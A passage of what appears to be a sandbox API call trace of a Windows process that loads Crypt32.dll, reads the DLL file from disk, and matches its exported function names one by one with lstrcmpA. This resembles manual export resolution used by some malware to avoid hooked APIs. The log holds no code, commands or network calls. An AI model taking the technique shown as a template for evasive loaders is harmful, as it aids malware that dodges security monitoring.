lpString2="BCryptDuplicateKey") returned 1 [0137.993] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptEncrypt") returned 0 [0137.993] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptAddContextFunction") returned 1 [0137.993] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptAddContextFunctionProvider") returned 1 [0137.993] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0137.993] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptConfigureContext") returned 1 [0137.993] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptConfigureContextFunction") returned 1 [0137.994] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptCreateContext") returned 1 [0137.994] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptCreateHash") returned 1 [0137.994] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptCreateMultiHash") returned 1 [0137.994] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptDecrypt") returned 1 [0137.994] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptDeleteContext") returned 1 [0137.994] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptDeriveKey") returned 1 [0137.994] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptDeriveKeyCapi") returned 1 [0137.994] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptDeriveKeyPBKDF2") returned 1 [0137.994] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptDestroyHash") returned 1 [0137.994] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptDestroyKey") returned 1 [0137.994] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptDestroySecret") returned 1 [0137.994] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptDuplicateHash") returned 1 [0137.994] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptDuplicateKey") returned 1 [0137.994] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptEncrypt") returned 1 [0137.994] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptEnumAlgorithms") returned 0 [0137.994] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptAddContextFunction") returned 1 [0137.994] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptAddContextFunctionProvider") returned 1 [0137.994] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0137.994] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptConfigureContext") returned 1 [0137.994] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptConfigureContextFunction") returned 1 [0137.994] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptCreateContext") returned 1 [0137.994] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptCreateHash") returned 1 [0137.994] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptCreateMultiHash") returned 1 [0137.994] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptDecrypt") returned 1 [0137.994] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptDeleteContext") returned 1 [0137.994] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptDeriveKey") returned 1 [0137.994] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptDeriveKeyCapi") returned 1 [0137.994] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptDeriveKeyPBKDF2") returned 1 [0137.994] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptDestroyHash") returned 1 [0137.994] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptDestroyKey") returned 1 [0137.994] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptDestroySecret") returned 1 [0137.994] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptDuplicateHash") returned 1 [0137.994] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptDuplicateKey") returned 1 [0137.995] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptEncrypt") returned 1 [0137.995] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptEnumAlgorithms") returned 1 [0137.995] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptEnumContextFunctionProviders") returned 0 [0137.995] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptAddContextFunction") returned 1 [0137.995] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptAddContextFunctionProvider") returned 1 [0137.995] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0137.995] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptConfigureContext") returned 1 [0137.995] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptConfigureContextFunction") returned 1 [0137.995] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptCreateContext") returned 1 [0137.995] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptCreateHash") returned 1 [0137.995] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptCreateMultiHash") returned 1 [0137.995] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptDecrypt") returned 1 [0137.995] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptDeleteContext") returned 1 [0137.995] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptDeriveKey") returned 1 [0137.995] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptDeriveKeyCapi") returned 1 [0137.995] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptDeriveKeyPBKDF2") returned 1 [0137.995] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptDestroyHash") returned 1 [0137.995] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptDestroyKey") returned 1 [0137.995] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptDestroySecret") returned 1 [0137.995] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptDuplicateHash") returned 1 [0137.995] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptDuplicateKey") returned 1 [0137.996] GetProcessHeap () returned 0x530000 [0137.996] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2d52010 | out: hHeap=0x530000) returned 1 [0137.996] GetProcessHeap () returned 0x530000 [0137.996] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x10) returned 0x549140 [0137.996] LoadLibraryA (lpLibFileName="Crypt32.dll") returned 0x7ffc5c190000 [0138.004] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0138.004] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0138.005] GetModuleFileNameA (in: hModule=0x7ffc5c190000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\Crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll")) returned 0x1f [0138.005] CreateFileA (lpFileName="C:\\Windows\\system32\\Crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0138.005] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0138.005] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0138.005] GetFileSizeEx (in: hFile=0x160, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=1847520) returned 1 [0138.005] GetProcessHeap () returned 0x530000 [0138.005] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x1c30e0) returned 0x411a040 [0138.009] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0138.009] ReadFile (in: hFile=0x160, lpBuffer=0x411a040, nNumberOfBytesToRead=0x1c30e0, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x411a040*, lpNumberOfBytesRead=0x14f5a4*=0x1c30e0, lpOverlapped=0x0) returned 1 [0139.057] CloseHandle (hObject=0x160) returned 1 [0139.058] lstrcmpA (lpString1="CertAddCRLContextToStore", lpString2="CertAddCRLContextToStore") returned 0 [0139.058] lstrcmpA (lpString1="CertAddCRLLinkToStore", lpString2="CertAddCRLContextToStore") returned 1 [0139.058] lstrcmpA (lpString1="CertAddCRLLinkToStore", lpString2="CertAddCRLLinkToStore") returned 0 [0139.058] lstrcmpA (lpString1="CertAddCTLContextToStore", lpString2="CertAddCRLContextToStore") returned 1 [0139.058] lstrcmpA (lpString1="CertAddCTLContextToStore", lpString2="CertAddCRLLinkToStore") returned 1 [0139.058] lstrcmpA (lpString1="CertAddCTLContextToStore", lpString2="CertAddCTLContextToStore") returned 0 [0139.058] lstrcmpA (lpString1="CertAddCTLLinkToStore", lpString2="CertAddCRLContextToStore") returned 1 [0139.058] lstrcmpA (lpString1="CertAddCTLLinkToStore", lpString2="CertAddCRLLinkToStore") returned 1 [0139.058] lstrcmpA (lpString1="CertAddCTLLinkToStore", lpString2="CertAddCTLContextToStore") returned 1 [0139.058] lstrcmpA (lpString1="CertAddCTLLinkToStore", lpString2="CertAddCTLLinkToStore") returned 0 [0139.058] lstrcmpA (lpString1="CertAddCertificateContextToStore", lpString2="CertAddCRLContextToStore") returned -1 [0139.058] lstrcmpA (lpString1="CertAddCertificateContextToStore", lpString2="CertAddCRLLinkToStore") returned -1 [0139.058] lstrcmpA (lpString1="CertAddCertificateContextToStore", lpString2="CertAddCTLContextToStore") returned -1 [0139.058] lstrcmpA (lpString1="CertAddCertificateContextToStore", lpString2="CertAddCTLLinkToStore") returned -1 [0139.058] lstrcmpA (lpString1="CertAddCertificateContextToStore", lpString2="CertAddCertificateContextToStore") returned 0 [0139.058] lstrcmpA (lpString1="CertAddCertificateLinkToStore", lpString2="CertAddCRLContextToStore") returned -1 [0139.058] lstrcmpA (lpString1="CertAddCertificateLinkToStore", lpString2="CertAddCRLLinkToStore") returned -1 [0139.058] lstrcmpA (lpString1="CertAddCertificateLinkToStore", lpString2="CertAddCTLContextToStore") returned -1 [0139.058] lstrcmpA (lpString1="CertAddCertificateLinkToStore", lpString2="CertAddCTLLinkToStore") returned -1 [0139.059] lstrcmpA (lpString1="CertAddCertificateLinkToStore", lpString2="CertAddCertificateContextToStore") returned 1 [0139.059] lstrcmpA (lpString1="CertAddCertificateLinkToStore", lpString2="CertAddCertificateLinkToStore") returned 0 [0139.059] lstrcmpA (lpString1="CertAddEncodedCRLToStore", lpString2="CertAddCRLContextToStore") returned 1 [0139.059] lstrcmpA (lpString1="CertAddEncodedCRLToStore", lpString2="CertAddCRLLinkToStore") returned 1 [0139.059] lstrcmpA (lpString1="CertAddEncodedCRLToStore", lpString2="CertAddCTLContextToStore") returned 1 [0139.059] lstrcmpA (lpString1="CertAddEncodedCRLToStore", lpString2="CertAddCTLLinkToStore") returned 1 [0139.059] lstrcmpA (lpString1="CertAddEncodedCRLToStore", lpString2="CertAddCertificateContextToStore") returned 1 [0139.059] lstrcmpA (lpString1="CertAddEncodedCRLToStore", lpString2="CertAddCertificateLinkToStore") returned 1 [0139.059] lstrcmpA (lpString1="CertAddEncodedCRLToStore", lpString2="CertAddEncodedCRLToStore") returned 0 [0139.059] lstrcmpA (lpString1="CertAddEncodedCTLToStore", lpString2="CertAddCRLContextToStore") returned 1 [0139.059] lstrcmpA (lpString1="CertAddEncodedCTLToStore", lpString2="CertAddCRLLinkToStore") returned 1 [0139.059] lstrcmpA (lpString1="CertAddEncodedCTLToStore", lpString2="CertAddCTLContextToStore") returned 1 [0139.059] lstrcmpA (lpString1="CertAddEncodedCTLToStore", lpString2="CertAddCTLLinkToStore") returned 1 [0139.060] lstrcmpA (lpString1="CertAddEncodedCTLToStore", lpString2="CertAddCertificateContextToStore") returned 1 [0139.060] lstrcmpA (lpString1="CertAddEncodedCTLToStore", lpString2="CertAddCertificateLinkToStore") returned 1 [0139.060] lstrcmpA (lpString1="CertAddEncodedCTLToStore", lpString2="CertAddEncodedCRLToStore") returned 1 [0139.060] lstrcmpA (lpString1="CertAddEncodedCTLToStore", lpString2="CertAddEncodedCTLToStore") returned 0 [0139.060] lstrcmpA (lpString1="CertAddEncodedCertificateToStore", lpString2="CertAddCRLContextToStore") returned 1 [0139.060] lstrcmpA (lpString1="CertAddEncodedCertificateToStore", lpString2="CertAddCRLLinkToStore") returned 1 [0139.060] lstrcmpA (lpString1="CertAddEncodedCertificateToStore", lpString2="CertAddCTLContextToStore") returned 1 [0139.060] lstrcmpA (lpString1="CertAddEncodedCertificateToStore", lpString2="CertAddCTLLinkToStore") returned 1 [0139.060] lstrcmpA (lpString1="CertAddEncodedCertificateToStore", lpString2="CertAddCertificateContextToStore") returned 1 [0139.060] lstrcmpA (lpString1="CertAddEncodedCertificateToStore", lpString2="CertAddCertificateLinkToStore") returned 1 [0139.060] lstrcmpA (lpString1="CertAddEncodedCertificateToStore", lpString2="CertAddEncodedCRLToStore") returned -1 [0139.060] lstrcmpA (lpString1="CertAddEncodedCertificateToStore", lpString2="CertAddEncodedCTLToStore") returned -1 [0139.060] lstrcmpA (lpString1="CertAddEncodedCertificateToStore", lpString2="CertAddEncodedCertificateToStore") returned 0 [0139.060] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertAddCRLContextToStore") returned 1 [0139.060] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertAddCRLLinkToStore") returned 1 [0139.060] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertAddCTLContextToStore") returned 1 [0139.060] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertAddCTLLinkToStore") returned 1 [0139.060] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertAddCertificateContextToStore") returned 1 [0139.060] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertAddCertificateLinkToStore") returned 1 [0139.060] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertAddEncodedCRLToStore") returned -1 [0139.060] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertAddEncodedCTLToStore") returned -1 [0139.061] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertAddEncodedCertificateToStore") returned 1 [0139.061] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 0 [0139.061] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddCRLContextToStore") returned 1 [0139.061] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddCRLLinkToStore") returned 1 [0139.061] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddCTLContextToStore") returned 1 [0139.061] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddCTLLinkToStore") returned 1 [0139.061] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddCertificateContextToStore") returned 1 [0139.061] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddCertificateLinkToStore") returned 1 [0139.061] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddEncodedCRLToStore") returned -1 [0139.061] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddEncodedCTLToStore") returned -1 [0139.061] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddEncodedCertificateToStore") returned 1 [0139.061] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0139.061] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 0 [0139.061] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddCRLContextToStore") returned 1 [0139.061] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddCRLLinkToStore") returned 1 [0139.061] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddCTLContextToStore") returned 1 [0139.061] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddCTLLinkToStore") returned 1 [0139.061] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddCertificateContextToStore") returned 1 [0139.061] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddCertificateLinkToStore") returned 1 [0139.061] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddEncodedCRLToStore") returned 1 [0139.061] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddEncodedCTLToStore") returned 1 [0139.064] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddEncodedCertificateToStore") returned 1 [0139.064] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0139.064] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0139.064] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 0 [0139.065] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddCRLContextToStore") returned 1 [0139.065] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddCRLLinkToStore") returned 1 [0139.065] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddCTLContextToStore") returned 1 [0139.065] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddCTLLinkToStore") returned 1 [0139.065] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddCertificateContextToStore") returned 1 [0139.065] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddCertificateLinkToStore") returned 1 [0139.065] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddEncodedCRLToStore") returned 1 [0139.065] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddEncodedCTLToStore") returned 1 [0139.065] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddEncodedCertificateToStore") returned 1 [0139.065] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0139.065] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0139.065] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 1 [0139.065] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddRefServerOcspResponse") returned 0 [0139.065] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddCRLContextToStore") returned 1 [0139.065] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddCRLLinkToStore") returned 1 [0139.065] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddCTLContextToStore") returned 1 [0139.065] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddCTLLinkToStore") returned 1 [0139.065] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddCertificateContextToStore") returned 1 [0139.065] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddCertificateLinkToStore") returned 1 [0139.065] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddEncodedCRLToStore") returned 1 [0139.065] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddEncodedCTLToStore") returned 1 [0139.065] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddEncodedCertificateToStore") returned 1 [0139.065] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0139.065] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0139.065] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 1 [0139.065] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddRefServerOcspResponse") returned 1 [0139.065] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddRefServerOcspResponseContext") returned 0 [0139.066] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddCRLContextToStore") returned 1 [0139.066] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddCRLLinkToStore") returned 1 [0139.066] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddCTLContextToStore") returned 1 [0139.066] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddCTLLinkToStore") returned 1 [0139.066] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddCertificateContextToStore") returned 1 [0139.066] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddCertificateLinkToStore") returned 1 [0139.066] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddEncodedCRLToStore") returned 1 [0139.066] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddEncodedCTLToStore") returned 1 [0139.066] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddEncodedCertificateToStore") returned 1 [0139.066] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0139.066] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0139.066] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 1 [0139.066] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddRefServerOcspResponse") returned 1 [0139.066] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddRefServerOcspResponseContext") returned 1 [0139.066] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddSerializedElementToStore") returned 0 [0139.066] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddCRLContextToStore") returned 1 [0139.066] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddCRLLinkToStore") returned 1 [0139.066] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddCTLContextToStore") returned 1 [0139.066] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddCTLLinkToStore") returned 1 [0139.066] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddCertificateContextToStore") returned 1 [0139.066] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddCertificateLinkToStore") returned 1 [0139.066] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddEncodedCRLToStore") returned 1 [0139.066] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddEncodedCTLToStore") returned 1 [0139.066] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddEncodedCertificateToStore") returned 1 [0139.066] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0139.067] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0139.067] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 1 [0139.067] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddRefServerOcspResponse") returned 1 [0139.067] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddRefServerOcspResponseContext") returned 1 [0139.067] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddSerializedElementToStore") returned 1 [0139.067] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddStoreToCollection") returned 0 [0139.067] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddCRLContextToStore") returned 1 [0139.067] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddCRLLinkToStore") returned 1 [0139.067] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddCTLContextToStore") returned 1 [0139.067] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddCTLLinkToStore") returned 1 [0139.067] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddCertificateContextToStore") returned 1 [0139.067] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddCertificateLinkToStore") returned 1 [0139.067] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddEncodedCRLToStore") returned 1 [0139.067] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddEncodedCTLToStore") returned 1 [0139.067] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddEncodedCertificateToStore") returned 1 [0139.067] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0139.067] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0139.067] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 1 [0139.067] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddRefServerOcspResponse") returned 1 [0139.067] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddRefServerOcspResponseContext") returned 1 [0139.067] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddSerializedElementToStore") returned 1 [0139.068] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddStoreToCollection") returned 1 [0139.068] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAlgIdToOID") returned 0 [0139.068] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddCRLContextToStore") returned 1 [0139.068] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddCRLLinkToStore") returned 1 [0139.068] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddCTLContextToStore") returned 1 [0139.068] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddCTLLinkToStore") returned 1 [0139.068] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddCertificateContextToStore") returned 1 [0139.068] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddCertificateLinkToStore") returned 1 [0139.068] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddEncodedCRLToStore") returned 1 [0139.068] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddEncodedCTLToStore") returned 1 [0139.068] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddEncodedCertificateToStore") returned 1 [0139.068] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0139.068] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0139.068] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 1 [0139.068] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddRefServerOcspResponse") returned 1 [0139.068] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddRefServerOcspResponseContext") returned 1 [0139.068] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddSerializedElementToStore") returned 1 [0139.068] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddStoreToCollection") returned 1 [0139.068] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAlgIdToOID") returned 1 [0139.068] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertCloseServerOcspResponse") returned 0 [0139.068] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddCRLContextToStore") returned 1 [0139.068] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddCRLLinkToStore") returned 1 [0139.068] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddCTLContextToStore") returned 1 [0139.068] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddCTLLinkToStore") returned 1 [0139.068] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddCertificateContextToStore") returned 1 [0139.068] lstrcmpA 